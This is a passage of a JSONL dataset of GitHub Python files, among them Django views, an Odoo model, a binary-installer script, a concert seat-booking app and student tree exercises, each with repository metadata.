apw c y\", \"8 hyyq z p\", \"6 3272401\",\n # \"c otdk cl\", \"8 ksif m u\"]\n\n","repo_name":"OnMyTeam/Algorithm","sub_path":"Python/reorderlogfiles(937).py","file_name":"reorderlogfiles(937).py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"40178868561","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\n\ndef init_arg():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\")\n parser.add_argument(\"-o\")\n parser.add_argument(\"--xname\")\n parser.add_argument(\"--yname\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n\n args = init_arg()\n\n xname = args.xname\n yname = args.yname\n \n idir = args.i\n fn_fdr = '{}/{}_{}_FDR.csv'.format(idir, xname, yname)\n fn_tpr = '{}/{}_{}_TPR.csv'.format(idir, xname, yname)\n\n df_fdr = pd.read_csv(fn_fdr)\n df_tpr = pd.read_csv(fn_tpr)\n col_lst = list(df_fdr.columns)\n fdr_lst = []\n tpr_lst = []\n for col in col_lst:\n fdr_lst.append(np.mean(df_fdr[col]))\n tpr_lst.append(np.mean(df_tpr[col]))\n\n plt.plot(tpr_lst, label='tpr')\n plt.plot(fdr_lst, label='fdr')\n plt.legend()\n plt.title('column wise mean of tpr and fdr for {} {}'.format(xname, yname))\n if args.o is None:\n plt.show()\n else:\n plt.savefig(args.o)\n","repo_name":"jzy95310/mlforhealthlabpub","sub_path":"alg/knockoffgan/plot_fdr_tpr.py","file_name":"plot_fdr_tpr.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"38454161519","text":"#!/usr/bin/env python3\n\n#importe indirectement tp5 et tp5_ex* pour * < 3\nfrom tp5_ex3 import *\nfrom math import sqrt\n\n#\n# À COMPLÉTER !\n#\n''' renvoie un ABR de taille n construit par insertions successives\n des éléments de la permutation perm (de taille n^2), puis suppression\n d'éléments aléatoires '''\ndef genererABRparInsPuisSup(perm) :\n arbre=Vide\n lenPerm=len(perm)\n for i in range(0,lenPerm):\n insertionABR(arbre,perm[i])\n for i in range(0,lenPerm-(int(sqrt(lenPerm)))):\n suppressionABR(arbre,perm[i],True)\n return arbre\n\n#\n# À COMPLÉTER !\n#\n''' renvoie un couple (ABR, taille) construit par\n insertions/supressions successives entremêlées des éléments de\n permins et permsup respectivement '''\ndef genererABRparInsEtSup(permins, permsup) :\n arbre = Vide\n taille=0\n for i in range(0,len(permins)):\n if i%2==0:\n insertionABR(arbre, permins[i])\n taille+=1\n else:\n if suppressionABR(arbre,permsup[i],True) is not None:\n taille-=1\n return arbre,taille\n\n#\n# À COMPLÉTER !\n#\n''' renvoie le tableau des hauteurs de m arbres de taille n,\n construits par genererABRparInsPuisSup '''\ndef statsHauteursABRparInsPuisSup(n, m) :\n res = []\n for i in range(m):\n arbre = genererABRparInsPuisSup(permutation(n))\n tmp = hauteur(arbre)\n res.append(tmp)\n return res\n\n#\n# À COMPLÉTER !\n#\n''' renvoie le tableau des (taille, hauteur)s de m arbres\n construits par genererABRparInsEtSup sur 2 permutations de taille 2n '''\ndef statsHauteursABRparInsEtSup(n, m) :\n res = []\n for i in range(m):\n arbre,taille = genererABRparInsEtSup(permutation(2*n),permutation(2*n))\n res+=[(taille,hauteur(arbre))]\n return res\n\n#\n# NE PAS MODIFIER\n#\n\ndef tracerInsPuisSup(limite, pas, m):\n print('Test InsPuisSup')\n lx, ly, ly_moy = [], [], []\n for i in range(1, limite, pas) :\n print('Stat calculée : %d / %d' % (i, limite), end=\"\\r\")\n tmp = statsHauteursABRparInsPuisSup(i, m)\n lx.extend([i]*m)\n ly.extend(tmp)\n ly_moy.append(sum(tmp)/m)\n print('Stat calculée : %d / %d' % (limite, limite))\n plt.plot([(math.log(i,2) if i>0 else 0) for i in range(limite)], color=\"blue\")\n plt.plot(lx, ly, '.', color=\"orange\")\n plt.plot(range(1,limite,pas), ly_moy, color=\"red\")\n plt.ylabel('hauteur(n)')\n plt.xlabel('n = nombre noeuds')\n plt.title('Distribution des hauteurs d\\'arbres aléatoires obtenus par insertions puis suppressions')\n plt.show()\n print('')\n\ndef tracerInsEtSup(limite, pas, m):\n print('Test InsEtSup')\n lx, ly = [], []\n plt.plot([(math.log(i,2) if i>0 else 0) for i in range(limite)], color=\"blue\")\n for i in range(1, limite, pas) :\n print('Stat calculée : %d / %d' % (i, limite), end=\"\\r\")\n tailles, hauteurs = list(zip(*statsHauteursABRparInsEtSup(i, m)))\n lx.extend(tailles)\n ly.extend(hauteurs)\n print('Stat calculée : %d / %d' % (limite, limite))\n plt.plot(lx, ly, '.', color=\"green\")\n plt.ylabel('hauteur(n)')\n plt.xlabel('n = nombre noeuds')\n plt.title('Distribution des hauteurs d\\'arbres aléatoires obtenus par insertions et suppressions')\n plt.show()\n print('')\n\n\nif __name__ == '__main__':\n tracerInsPuisSup(100,5,5)\n tracerInsEtSup(1000,50,10)\n","repo_name":"ryohkhn/University","sub_path":"L2/EA2/TP5/tp5_ex4.py","file_name":"tp5_ex4.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"494764451","text":"from .forms import Post_info_form, Upload_image_form, SearchForm\nfrom zipfile import ZipFile\nfrom .models import Post,UploadImages\nfrom os.path import basename\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.db.models import Q\nfrom django.views.generic import ListView, View, DeleteView\nfrom django.core.exceptions import ObjectDoesNotExist, ImproperlyConfigured\nfrom django.db.models.query import QuerySet\n\n\nclass SearchView(View):\n \n def get(self, *args, **kwargs):\n form = SearchForm()\n context = {'form':form}\n return render(self.request,\"HomePage.html\",context)\n\n def post(self, *args, **kwargs):\n # Must get data with forms.ChoiceField() , create choise dictionary, but .... it's too long \n Class = self.request.POST.get('Class')\n matiere = self.request.POST.get('matiere')\n nature = self.request.POST.get('nature')\n \n return redirect(\"isima_trivez:list_of_post\",Class,matiere,nature)\n\n\n\nclass PostsView(ListView):\n template_name = 'PostPage.html'\n model = Post\n queryset = None\n \n def get_ordering(self):\n #Return the field or fields to use for ordering the queryset.\n return self.ordering\n\n def get_queryset(self,*args):\n\n matiere = self.kwargs['matiere'] \n Class = self.kwargs['Class'] \n nature = self.kwargs['nature'] \n # print('============================================') \n # print(Class)\n \n if (not args )== True :\n # print(\"homepage\")\n if self.queryset is not None:\n queryset = self.queryset\n if isinstance(queryset,QuerySet):\n queryset = queryset.all()\n\n elif self.model is not None :\n queryset = self.model.objects.filter(\n Q(matire=matiere)| \n Q(degree=Class) | \n Q(nature=nature)\n )\n\n \n\n else :\n raise ImproperlyConfigured(\n \"%(cls)s is missing a QuerySet. Define \"\n \"%(cls)s.model, %(cls)s.queryset, or override \"\n \"%(cls)s.get_queryset().\" % {\n 'cls': self.__class__.__name__\n })\n elif (not args) == False:\n # print(\"post_list_page\")\n if self.model is not None :\n \n queryset = self.model.objects.filter(\n Q(matire=args[0]) |\n Q(degree=args[1]) | \n Q(nature=args[2])\n )\n print(f\"=============={queryset}\")\n \n ordering = self.get_ordering()\n if ordering : \n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n return queryset\n\n def post(self, request, *args, **kwargs):\n Class = self.request.POST.get('Class')\n matiere = self.request.POST.get('matiere')\n nature = self.request.POST.get('nature')\n object_list = self.get_queryset(matiere,Class, nature)\n\n return render(request, self.template_name, {'object_list':object_list})\n\n \n#####TODO: try this function to get url images \n #views.py\n# multi_image_instance = MultiImage.objects.get(id=...)\n# images = multi_image_instance.other_images # this will return a QuerySet\n# ================================================\n ##templates\n# {% for image in images %}\n# \n# {% endfor %}\n\n \n\n\n\ndef upload_post(request):\n \n if request.method == 'POST':\n post_info = Post_info_form(request.POST)\n \n images_uploded = Upload_image_form(request.POST or None, request.FILES or None)\n image = request.FILES.getlist('image')\n \n\n if post_info.is_valid() and images_uploded.is_valid():\n post = post_info.save(commit=False)\n post.save()\n for f in image:\n \n photos = UploadImages(post=post, image = f)\n \n photos.save()\n else:\n post_info = Post_info_form()\n images_uploded = Upload_image_form()\n context = {\n 'post_info': post_info,\n 'images_uploded': images_uploded\n }\n return render(request, 'PostDetail.html', context)\n\n\n\ndef download_zip_file(self, pk):\n \"\"\"Download archive zip file of code snippets\"\"\"\n queryset = get_object_or_404(Post, pk=pk)\n image_list = queryset.uploadimages_set.all()\n response = HttpResponse(content_type='application/zip')\n zf = ZipFile(response, 'w')\n ZIPFILE_NAME = \"test.zip\"\n for image in image_list:\n url = image.image.url\n url = f\"{settings.MEDIA_ROOT}{url[6:]}\"\n zf.write(url, basename(url))\n\n response['Content-Disposition'] = f'attachment; filename={ZIPFILE_NAME}'\n return response\n\n\n\n\n\n\n","repo_name":"Omdaprog/ISIMA","sub_path":"isima_trivez/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39652083075","text":"import os\n\n\nSERVICE_VARIANT = os.environ[\"SERVICE_VARIANT\"]\nassert SERVICE_VARIANT in (\"lms\", \"cms\")\nexec(\"from {}.envs.derex.base import *\".format(SERVICE_VARIANT), globals(), locals())\n\nUSE_I18N = True\n# LANGUAGE_CODE = \"de-de\"\n\n# Id of the site fixture to use, instead of looking up the hostname\nSITE_ID = 1\n\n# Notes settings\nFEATURES[\"ENABLE_EDXNOTES\"] = True # type: ignore # noqa\nEDXNOTES_PUBLIC_API = \"http://localhost:8120/api/v1\"\nEDXNOTES_INTERNAL_API = \"http://notes:8120/api/v1\"\n","repo_name":"Abstract-Tech/derex.runner","sub_path":"examples/notes/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"25560251856","text":"#if A[K]=X 이면 increate\n#if A[K]=N+1 이면 max counter\n#[3,4,4,6,1,4,4]\n\ndef solution(N,A):\n result=[0]*N\n for i in A:\n if 1<=i<=N:\n result[i-1]+=1\n else:\n result=[max(result)]*N\n return result\n","repo_name":"vvspearlvvs/CodingTest","sub_path":"6.Codility/4.3 MaxCounters/co.py","file_name":"co.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19726349327","text":"from odoo import models, fields, api\n\nclass EstatePropertyType(models.Model):\n _name = \"estate.property.type\"\n _description = \"estate.property.type\"\n _order = \"sequence, name\"\n\n name = fields.Char(\"Type\", required=True)\n sequence = fields.Integer(\"Sequence\", default=1)\n property_ids = fields.One2many(\"estate.property\", \"property_type_id\", string=\"Properties\")\n\n offer_ids = fields.One2many(\"estate.property.offer\", \"property_type_id\")\n\n offer_count = fields.Integer(\"Offers\", compute=\"_compute_offer_count\")\n @api.depends(\"offer_ids\")\n def _compute_offer_count(self):\n # This solution is quite complex. It is likely that the trainee would have done a search in\n # a loop.\n data = self.env[\"estate.property.offer\"].read_group(\n [(\"property_id.state\", \"!=\", \"canceled\"), (\"property_type_id\", \"!=\", False)],\n [\"ids:array_agg(id)\", \"property_type_id\"],\n [\"property_type_id\"],\n )\n mapped_count = {d[\"property_type_id\"][0]: d[\"property_type_id_count\"] for d in data}\n mapped_ids = {d[\"property_type_id\"][0]: d[\"ids\"] for d in data}\n for prop_type in self:\n prop_type.offer_count = mapped_count.get(prop_type.id, 0)\n prop_type.offer_ids = mapped_ids.get(prop_type.id, [])\n\n _sql_constraints = [\n (\"name_unique\", \"unique (name)\", \"Type name already exists\"),\n ]\n","repo_name":"fvkugit/odooapps","sub_path":"estate/models/estate_property_type.py","file_name":"estate_property_type.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71417502186","text":"import random\nW = '\\33[0m'\nR = '\\33[31m'\nG = '\\33[32m'\nO = '\\33[33m'\nB = '\\33[34m'\nP = '\\33[35m'\ncolor = [W, R, G, O, B, P]\na = 1\nb = 1\nchoice2 = []\nn = 0\nN = 0\nwhile (N <= 0) or (n <= 0) or (N <= n):\n n = int(input(\"How many color do you want (below or equals to 6)? \\n\"))\n col = color[:n]\n N = int(input(\"How many integer...(above the number of colors)\\n\"))\n\nfor i in range(1, N + 1):\n choice = random.choice(col)\n print(choice, i, end=\" \")\n choice2.append(choice)\n","repo_name":"popolito1/Project-1-Schur-s-Number","sub_path":"Exercices/3.2.2.py","file_name":"3.2.2.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42592586636","text":"#!/usr/bin/env python3\n\n\"\"\"Downloads and installs binary packages.\n\nUses a provided config file of packages (and included metadata) to download, extract, and\ninstall each package. It is also able to handle extracting binaries from certain archive types.\n\nFor more information, see the included README file.\n\nExamples:\n\n For example usage, see `python3 infrastaller.py --help`.\n\"\"\"\n\nimport json\nimport os\nimport shutil\nimport sys\nimport tarfile\nimport tempfile\nimport urllib.request\nimport zipfile\nfrom collections.abc import Mapping\nfrom pathlib import Path, PurePath\nfrom typing import Union\n\nimport click\nimport logzero\nfrom logzero import logger\n\nDEFAULT_BIN_PATH = Path(\"/usr/local/bin\")\nDEFAULT_CONFIG_PATH = Path.cwd() / \"packages.json\"\n#\n# `SYSTEM` and `MACHINE` are used for replacing templated strings in the config file, namely\n# the `url` and `file_to_extract` fields. `SYSTEM` should resolve to 'linux' or 'darwin', and\n# `MACHINE` is normally 'x86_64' (this may change with new Apple hardware eventually). But most\n# download links use 'amd64' instead of 'x86_64', so this replacement is done here.\n#\nSYSTEM = os.uname().sysname.lower()\nMACHINE = os.uname().machine.lower().replace(\"x86_64\", \"amd64\")\n\n\ndef configure_logging(verbosity: str) -> None:\n \"\"\"Configures logzero verbosity.\"\"\"\n\n logging_levels = {\n \"quiet\": {\"output\": logzero.NOTSET, \"format\": \"\"},\n \"normal\": {\"output\": logzero.INFO, \"format\": \"%(color)s%(message)s%(end_color)s\"},\n \"verbose\": {\"output\": logzero.DEBUG, \"format\": \"%(color)s%(message)s%(end_color)s\"},\n \"debug\": {\n \"output\": logzero.DEBUG,\n \"format\": (\n \"[%(levelname)8s %(asctime)s %(funcName)s:%(lineno)d] \"\n \"%(color)s%(message)s%(end_color)s\"\n ),\n },\n }\n\n logzero.loglevel(logging_levels[verbosity][\"output\"])\n logzero.formatter(formatter=logzero.LogFormatter(fmt=logging_levels[verbosity][\"format\"]))\n\n\n@click.command()\n@click.option(\n \"-b\",\n \"--bin-path\",\n default=DEFAULT_BIN_PATH,\n type=click.Path(exists=True),\n help=f\"Full path to binary install location (default: {DEFAULT_BIN_PATH}).\",\n)\n@click.option(\n \"-c\",\n \"--config\",\n default=DEFAULT_CONFIG_PATH,\n type=click.Path(exists=True),\n help=f\"Full path to config file (default: {DEFAULT_CONFIG_PATH}).\",\n)\n@click.option(\n \"-p\",\n \"--package\",\n type=str,\n multiple=True,\n help=\"Specific package(s), defined in config file, to install.\",\n)\n@click.option(\n \"-g\",\n \"--group\",\n type=str,\n multiple=True,\n help=\"Specific group(s) of packages, defined in config file, to install.\",\n)\n@click.option(\n \"-o\",\n \"--output\",\n default=\"normal\",\n type=click.Choice([\"quiet\", \"normal\", \"verbose\", \"debug\"], case_sensitive=False),\n help=\"Set script output type (default: normal).\",\n)\ndef infrastaller(bin_path: str, config: str, package: tuple, group: tuple, output: str) -> None:\n \"\"\"Downloads and installs binaries.\n\n \\b\n Install all packages to default location:\n $ python3 infrastaller.py\n\n \\b\n Install packages to a custom location:\n $ python3 infrastaller.py --bin-path /root/bin\n\n \\b\n Read config from a custom location:\n $ python3 infrastaller.py --config /etc/my_packages.json\n\n \\b\n Install specific packages from config file:\n $ python3 infrastaller.py --package binary2 --package binary3\n\n \\b\n Install a group of packages and an individual package:\n $ python3 infrastaller.py --group my-packages --package binary2\n\n \\b\n Enable verbose output:\n $ python3 infrastaller.py --output verbose\n \"\"\"\n\n configure_logging(output)\n\n with open(config, \"rb\") as json_config:\n logger.debug(\"Reading config file %s\", config)\n packages_data = json.loads(json_config.read())\n\n for pkg_group, binaries in packages_data.items():\n for binary, appinfo in binaries.items():\n #\n # Package should be installed if:\n # - neither 'package' nor 'group' flags are set (i.e. install everything)\n # - passed by 'package' flag (user specified a package)\n # - the package is part of a group passed by 'group' flag (user specified a group)\n #\n if (package or group) and (binary in package or pkg_group in group):\n install_binary(Path(bin_path), binary, appinfo)\n\n logger.info(\"Installation complete\")\n\n\ndef install_binary(install_path: Path, binary_name: str, package_data: dict) -> None:\n \"\"\"Parses package metadata and wraps all installation steps.\n\n Args:\n install_path: The full path to the install directory.\n binary_name: Filename to give the binary in the install_path.\n package_data: Package metadata from the JSON config file.\n \"\"\"\n\n logger.info(\"Installing %s...\", binary_name)\n\n #\n # The `url` field can be a string or dictionary depending on if the link is template-able.\n # See the README for more information.\n #\n if isinstance(package_data[\"url\"], Mapping):\n url = replace_placeholder_in_string(package_data[\"url\"][SYSTEM], package_data[\"version\"])\n else:\n url = replace_placeholder_in_string(package_data[\"url\"], package_data[\"version\"])\n\n download_dir = Path(tempfile.mkdtemp())\n downloaded_file = download(url, download_dir)\n\n if \"extract\" in package_data:\n binary_to_install = extract(\n package_data[\"extract\"][\"type_of_archive\"],\n replace_placeholder_in_string(\n package_data[\"extract\"][\"file_to_extract\"], package_data[\"version\"]\n ),\n downloaded_file,\n )\n else:\n binary_to_install = downloaded_file\n\n binary_full_path = PurePath.joinpath(install_path, binary_name)\n move_bin(binary_to_install, binary_full_path)\n chmod_exec(binary_full_path)\n\n logger.info(\"Installed %s to %s\", binary_name, binary_full_path)\n\n if Path.is_dir(download_dir):\n logger.debug(\"Removing %s\", download_dir)\n shutil.rmtree(download_dir)\n\n\ndef download(source: str, save_path: Path) -> str:\n \"\"\"Download the package from a URL source.\"\"\"\n destination = PurePath.joinpath(save_path, os.path.basename(source))\n logger.debug(\"Downloading from %s\", source)\n logger.debug(\"Saving download to %s\", destination)\n with urllib.request.urlopen(source) as response, open(destination, \"wb\") as output:\n output.write(response.read())\n return destination\n\n\ndef extract(type_of_archive: str, file_to_extract: str, archive: Path) -> str:\n \"\"\"A wrapper method to extract tar.gz and zip archives.\n\n Args:\n type_of_archive: The file type of the archive (e.g. zip, targz).\n file_to_extract: The filename to extract from the archive.\n archive: The full path to the compressed file.\n \"\"\"\n\n logger.debug(\"Extracting %s\", archive)\n\n destination = archive.parent\n\n if type_of_archive == \"targz\":\n with tarfile.open(archive, \"r:gz\") as tar_file:\n tar_file.extract(file_to_extract, destination)\n elif type_of_archive == \"zip\":\n with zipfile.ZipFile(archive, \"r\") as zip_file:\n zip_file.extract(file_to_extract, destination)\n else:\n logger.error(\"Archive type %s not supported.\", type_of_archive)\n sys.exit(1)\n\n logger.debug(\"Extracted %s to %s\", file_to_extract, destination)\n return PurePath.joinpath(destination, file_to_extract)\n\n\ndef move_bin(source: Union[Path, str], destination: Union[Path, str]) -> None:\n \"\"\"Moves the binary to a location in the PATH.\"\"\"\n try:\n logger.debug(\"Moving %s to %s\", source, destination)\n shutil.move(source, destination)\n except OSError as error:\n logger.exception(error)\n sys.exit(1)\n\n\ndef chmod_exec(filename: Union[Path, str]) -> None:\n \"\"\"Makes a binary executable; unix 755 permissions.\"\"\"\n logger.debug(\"Making %s executable\", filename)\n os.chmod(filename, 0o0755) # Octal in Python needs the leading '0o'.\n\n\ndef replace_placeholder_in_string(string: str, version: str) -> str:\n \"\"\"Replaces instances of template variables with appropriate values.\"\"\"\n conversions = {\n \"{{ version }}\": version,\n \"{{ system }}\": SYSTEM,\n \"{{ machine }}\": MACHINE,\n }\n for placeholder, replacement in conversions.items():\n string = string.replace(placeholder, replacement)\n return string\n\n\nif __name__ == \"__main__\":\n # The following check is disabled because Click handles parameter values.\n # pylint: disable=no-value-for-parameter\n infrastaller()\n","repo_name":"bradleyfrank/notes-etc","sub_path":"scripts/Python/infrastaller.py","file_name":"infrastaller.py","file_ext":"py","file_size_in_byte":8622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70927295413","text":"#!/usr/bin/env python3\n\nimport re\nimport json\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom .version import USER_AGENT\n\nHEADERS = { \"User-Agent\": USER_AGENT }\nPLACE_URL = \"https://www.reddit.com/place?webview=true\"\n\nDICT_RE = re.compile(r'\\{.+\\}')\nWSURL_RE = re.compile(r'\"place_websocket_url\": *\"([^\"]+)\"')\n\n#\n# This is perhaps the most hacky part of the project.\n# Our goal is to get a URL that we can hook a WebSocket\n# up to, and the only way I've found to do this is to\n# load /place like a browser and parse the HTML.\n#\ndef get_websocket_url():\n r = requests.get(PLACE_URL, headers=HEADERS)\n\n try:\n # the compliant way\n dom = BeautifulSoup(r.text, \"html.parser\")\n element = dom.find(id='config')\n match = DICT_RE.search(element.text)\n obj = json.loads(match.group(0))\n return obj[\"place_websocket_url\"]\n\n except (json.JSONDecodeError, KeyError, TypeError, AttributeError) as e:\n # the hacky way\n match = WSURL_RE.search(r.text)\n if not match:\n return None\n else:\n return match.group(1)\n\n","repo_name":"bell345/saving-place","sub_path":"savingplace/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20511968621","text":"import json\nfrom json.decoder import JSONDecodeError\n\n\"\"\"\nThis example code creates a 2d list (2d matrix) that can store seating.\nThe matrix is populated with a since all seats are available\n\"\"\"\n\n# our test matrix has 20 rows and 26 columns\nimport re\n\n\nn_row = 20\nn_col = 26\nFRONT_ROW_PRICE = 80\nMIDDLE_ROW_PRICE = 50\nBACK_ROW_PRICE = 25\nMASK_FEE = 5\nREGEX = re.compile(r'([A-Za-z0-9]+[.-_])*[A-Za-z0-9]+@[A-Za-z0-9-]+(\\.[A-Z|a-z]{2,})+')\nalphaToNum = {'a':0, 'b':1, 'c':2, 'd':3, 'e':4, 'f':5, 'g':6, 'h':7,\n 'i':8, 'j':9, 'k':10, 'l':11, 'm':12, 'n':13, 'o':14,\n 'p':15, 'q':16, 'r':17, 's':18, 't':19, 'u':20, 'v':21,\n 'w':22, 'x':23, 'y':24, 'z':25}\n\n# available seat\navailable_seat = 'a'\nunavailable_seat = 'X'\n# create some available seating\nseating = []\n\ndef CreateSeating():\n for r in range(n_row):\n row = []\n for c in range(n_col):\n row.append(available_seat)\n seating.append(row)\n\ndef PrintSeating():\n # print available seating\n print('\\t' + \"a b c d e f g h i j k l m n o p q r s t u v w x y z\")\n for r in range(n_row):\n print(r, end=\"\\t\")\n for c in range(n_col):\n print(seating[r][c], end=\" \")\n print()\n\ndef SeatPricing():\n # print seating prices\n print()\n print(\"Front Rows price: $80, Rows 0-4\")\n print(\"Middle Rows price: $50, Rows 5-10\")\n print(\"Back Rows price: $25, Rows 11-19\")\n print()\n\ndef CheckRowSize(seat):\n if len(seat) == 3:\n row = int(seat[0:2])\n column = alphaToNum[seat[2]]\n else:\n row = int(seat[0])\n column = alphaToNum[seat[1]]\n return row, column\n\ndef CheckAvail(seat):\n row, column = CheckRowSize(seat)\n if row in [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]:\n print(\"Sorry, all odd rows are unavailable due to COVID restrictions.\")\n return False\n elif seating[row][column] == 'X':\n print(\"Sorry, this seat is occupied.\")\n return False\n \n if column == 24:\n if seating[row][column+1] == 'X' or seating[row][column-1] == 'X' or seating[row][column-2] == 'X':\n print(\"Sorry, this seat is unavailable due to COVID restrictions.\")\n return False\n elif column == 25:\n if seating[row][column-1] == 'X' or seating[row][column-2] == 'X':\n print(\"Sorry, this seat is unavailable due to COVID restrictions.\")\n return False\n else:\n if seating[row][column+1] == 'X' or seating[row][column+2] == 'X' or seating[row][column-1] == 'X' or seating[row][column-2] == 'X':\n print(\"Sorry, this seat is unavailable due to COVID restrictions.\")\n return False\n\ndef BuyTickets(purchaseList):\n ticketCosts = 0\n for x in purchaseList:\n row, column = CheckRowSize(x)\n seating[row][column] = 'X'\n if (0 <= row <= 4):\n ticketCosts = ticketCosts + FRONT_ROW_PRICE\n elif (5 <= row <= 10):\n ticketCosts = ticketCosts + MIDDLE_ROW_PRICE\n elif (11 <= row <= 19):\n ticketCosts = ticketCosts + BACK_ROW_PRICE\n\n tax = 0.0725*ticketCosts \n totalCost = ticketCosts + tax + MASK_FEE\n print()\n print(\"------------------------\")\n print(\"--- PURCHASE SUMMARY ---\")\n print(\"------------------------\")\n print(f\"Subtotal = ${ticketCosts:.2f}\")\n print(f\"State Tax = ${tax:.2f}\")\n print(f\"Mask Fee = ${MASK_FEE:.2f}\")\n print(f\"Total Cost = ${totalCost:.2f}\")\n\n print()\n print()\n while True:\n userName = input(\"Please enter your name: \").lower()\n if not (userName == \"\"):\n break\n else:\n print(\"Error! Name cannot be blank.\")\n while True:\n userEmail = input(\"Please enter your email: \")\n if re.fullmatch(REGEX, userEmail):\n break\n else:\n print(\"Error! Please provide a valid email address.\")\n\n jsonData.append({\n \"name\": userName,\n \"numTickets\": len(purchaseList),\n \"seats\": purchaseList,\n \"email\": userEmail,\n \"totalCost\": totalCost\n })\n with open(\"SavedSeatPurchases.json\", 'w+') as json_file:\n json.dump(jsonData, json_file, indent = 4, separators=(',',': '))\n\n\nuserQuit = False\nCreateSeating()\nwith open(\"SavedSeatPurchases.json\", \"r+\") as myJson:\n try:\n jsonData = json.load(myJson)\n for customer in jsonData:\n for x in customer['seats']:\n row, column = CheckRowSize(x)\n seating[row][column] = 'X'\n except JSONDecodeError:\n jsonData=[]\n print(\"File was empty, creating an empty list\")\n\nwhile (not userQuit):\n # menu\n print()\n print(\"•••••••••••••••••••••••\")\n print(\"Welcome to the Concert!\")\n print(\"•••••••••••••••••••••••\")\n print()\n print(\"[B] buy a ticket\")\n print(\"[D] display all purchases\")\n print(\"[S] search by name\")\n print(\"[V] view available seating\")\n print(\"[Q] quit\")\n print()\n\n # get the user input\n userInput = input(\"Enter a command:\")\n lowerInput = userInput.lower()\n firstChar = lowerInput[0:1]\n\n # quit\n if firstChar == 'q':\n userQuit = True\n print()\n print(\"Thank you for purchasing tickets for the concert!!\")\n print()\n \n # buy a ticket\n elif firstChar == 'b':\n \"\"\"\n - provide receipt with state tax of 7.25%\n - additional mandatory mask fee of $5\n - when purchase is made ask for name and email address\n \"\"\"\n\n PrintSeating()\n SeatPricing()\n while True:\n numTickets = input(\"How many tickets would you like to buy? \")\n if not (numTickets == \"\"):\n numTickets = int(numTickets)\n break\n else:\n print(\"Error! Number of tickets you are buying cannot be blank.\")\n ticketList = []\n print()\n print(\"All odd rows are unavailable due to COVID restrictions.\")\n print(\"When you choose your seat make sure to enter row number and column letter.\")\n print(\"For example: row 2 column c would be 2c\")\n print()\n for x in range(numTickets):\n while True:\n seatChoice = input(f\"Pick seat #{x+1} (m to go to menu): \").lower()\n if (seatChoice == \"\"):\n print(\"Error! Seat choice cannot be blank.\")\n continue\n if seatChoice == 'm':\n break\n if CheckAvail(seatChoice) == False:\n continue\n else:\n ticketList.append(seatChoice)\n break\n if seatChoice == 'm':\n break\n \n if seatChoice != 'm':\n BuyTickets(ticketList)\n\n\n # display all purchases\n elif firstChar == 'd':\n \"\"\"\n - prints all purchases made\n - shows the total amount of money the venue has made\n \"\"\"\n venueMoney = 0\n for customerPurchase in jsonData:\n print(f\"Customer ({customerPurchase['name']}) purchased {customerPurchase['numTickets']} ticket(s). Total price paid was ${customerPurchase['totalCost']:.2f}.\")\n venueMoney = venueMoney + customerPurchase['totalCost']\n print()\n print(f\"The total money the venue has made is ${venueMoney}\")\n\n \n # search by name\n elif firstChar == 's':\n \"\"\"\n - displays tickets purchased by user with specific name\n \"\"\"\n lookupUser = input(\"Please enter customers name to lookup tickets purchased: \").lower()\n for customer in jsonData:\n if lookupUser == customer['name']:\n print()\n print(f\"Customer ({lookupUser}) purchased {customer['numTickets']} ticket(s). Seat(s) are {customer['seats']}.\")\n break\n else:\n print()\n print(\"Error! Customer not found.\")\n\n # view available seating\n elif firstChar == 'v':\n \"\"\"\n - available seats are indicated with a lower case a\n - occupied seats are indicated with a capital X\n - 2 social distancing seats between each occupied seat on a row\n - 1 row distance between each row\n - bulk tickets can sit next to each other\n - 3 types of seating\n - front seat price $80\n - rows 0 - 4\n middle seat price $50\n - rows 5 - 10\n - back seat price $ 25\n - rows 11 - 19\n \"\"\"\n PrintSeating()","repo_name":"Avneet2026/Outdoor-Park-Concert-App","sub_path":"Concert-App.py","file_name":"Concert-App.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71763950134","text":"import face_recognition\nfrom PIL import Image\n\n# load image name\nimage = face_recognition.load_image_file(\"images/1.jpg\")\n\n# recognise faces and their locations (coordinates)\nface_locations = face_recognition.face_locations(image)\n\nprint(face_locations)\nprint(type(face_locations))\nprint(\"Faces found \", len(face_locations))\n\n'''\nTo crop your image, you need top-left and right-bottom coordinates (top, left, right, bottom)\nour face locations is organized differently (top, right, bottom, left)\n'''\nfor face_location in face_locations:\n # get the coordinates of the image\n top, right, bottom, left = face_location\n\n # Extract the region of the image that contains the face\n face_image = image[top:bottom, left:right]\n img = Image.fromarray(face_image)\n 